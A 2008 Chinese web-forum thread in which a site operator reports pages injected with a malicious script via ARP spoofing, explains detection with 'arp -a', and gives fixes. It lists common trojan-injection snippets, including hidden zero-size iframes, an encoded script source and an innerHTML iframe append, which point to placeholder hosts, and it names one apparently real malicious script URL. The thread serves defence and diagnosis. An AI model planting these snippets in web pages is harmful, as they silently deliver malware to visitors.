以文本方式查看主题 - 康柏仕电脑学院 (http://combss.com/bbs/index.asp) -- 硬件及网络技术资料储存区 (http://combss.com/bbs/list.asp?boardid=61) ---- [讨论]http://gua.ns2go.com/dir/index_pic/1.js 挂马 (http://combss.com/bbs/dispbbs.asp?boardid=61&id=2015) |
-- 作者:轻轻风聆 -- 发布时间:2008/7/19 19:01:39 -- [讨论]http://gua.ns2go.com/dir/index_pic/1.js 挂马 今天起床 结果发现论坛被挂了马 所有的网页上都有下面那句,很明显,是被批量挂马了 http://gua.ns2go.com/dir/index_pic/1.js 粗略看了下网页的原文件,数据库连接,图片都没发现有任何木马 随便建立个空白的HTML,居然也被挂~~~ ARP 挂马 正在找解决方法,突然发现服务器正常了 估计机房人发现了,清理掉了~~~~~ 现在说处理方法 运行 CMD 然后arp -a 可能会发现发现多了n个网关 仔细查看,你会发现有一台机器的Mac地址和网关的Mac地址相同 就是那机器问题了 然后电话机房吧~~~~~ |
-- 作者:轻轻风聆 -- 发布时间:2008/7/19 19:01:52 -- 总结下 一般出现下面的挂马情况 1.整个服务器没有出现挂马相关代码,也无webshell程序。 2.挂马代码都出现在所有页面的顶部(<HTML>标签前)。 3.随便建立个空白的HTML,也报毒 应该是ARP挂马了 下面是几种常见的挂马形式 一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 三:js变形加密 <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> <body ></body> 五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + \'\\r\\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>\'; 六:css中挂马 body { 七:JAJA挂马 <SCRIPT language=javascript> 八:图片伪装 <html> 九:伪装调用: <frameset rows="444,0" cols="*"> 十:高级欺骗 <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a> 解决方法: 1.通知机房(这个错不在你的机器上) 2.安装ARP防火墙 还有要注意的 ARP 具有嗅性 可以嗅到FTP 密码 进行卷土从来 所以记得修改FTP密码 [此贴子已经被作者于2008-7-19 19:07:29编辑过]
|